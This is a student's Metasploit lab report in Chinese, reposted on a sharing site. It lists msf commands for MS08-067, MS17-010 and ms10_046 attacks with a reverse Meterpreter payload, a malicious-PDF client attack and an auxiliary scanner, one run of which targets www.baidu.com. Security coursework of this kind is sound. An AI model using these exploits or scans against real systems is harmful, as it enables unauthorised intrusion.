其他分享
首页 > 其他分享> > 20174323张加欣-Exp6 msf基础应用

20174323张加欣-Exp6 msf基础应用

作者:互联网

1.实验目标与基础知识

1.1  实践对象  

1.2  实践内容  

1.3  基础知识  

(1)msf 模块说明

(2)msf常用漏洞利用命令

 

2.靶机准备

 

 

3.主动攻击

3.1  MS08-067 漏洞渗透攻击实践  

(由于重装虚拟机,未能及时将文件名改为学号)

set RHOST 192.168.145.132 //设置靶机IP
set LPORT 4323 //设置攻击机端口
set LHOST 192.168.145.131//设置攻击机IP
exploit

 

3.2  MS17_010漏洞渗透攻击实践  

set RHOST 192.168.145.133 //设置靶机IP
set LPORT 4323 //设置攻击机端口
set LHOST 192.168.145.131 //设置攻击机IP
exploit

 

4.针对浏览器的攻击

4.1  ms10_046 漏洞攻击  

set payload windows/meterpreter/reverse_tcp   //选择攻击载荷
set LHOST 192.168.145.131    //设置攻击者IP
set SRVHOST 192.168.145.131   //设置服务器IP(攻击者IP)
exploit     //进行攻击

 

5.针对客户端的攻击

set RHOST 192.168.145.132 //靶机ip
set LPORT 4323 //攻击端口
exploit //生成pdf

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
set RHOST 192.168.145.132 //靶机IP
set LPORT 4323 //攻击端口
exploit

 

6.成功应用任何一个辅助模块

use scanner/steam/server_info /使用漏洞
set RHOSTS 192.168.145.131 /起始IP exploit /开始攻击

set THREADS 50
set RHOSTS www.baidu.com
exploit

 

set RHOSTS 192.168.145.132 /靶机IP
set THREADS 50
exploit

 

 

7.问题回答

Q:用自己的话解释什么是exploit,payload,encode?

A:exploit——是一个漏洞攻击的工具,可以用来将恶意代码、漏洞注入靶机中。

      payload——是有效荷载,是用来真正实施攻击的恶意代码。

      encode——是编码,相当于是给 payload 披一件外套,让杀软难以分辨。

 

 

8.实验心得

标签:张加欣,set,攻击,Exp6,192.168,20174323,漏洞,exploit,模块
来源: https://www.cnblogs.com/174323jiaxin/p/12817385.html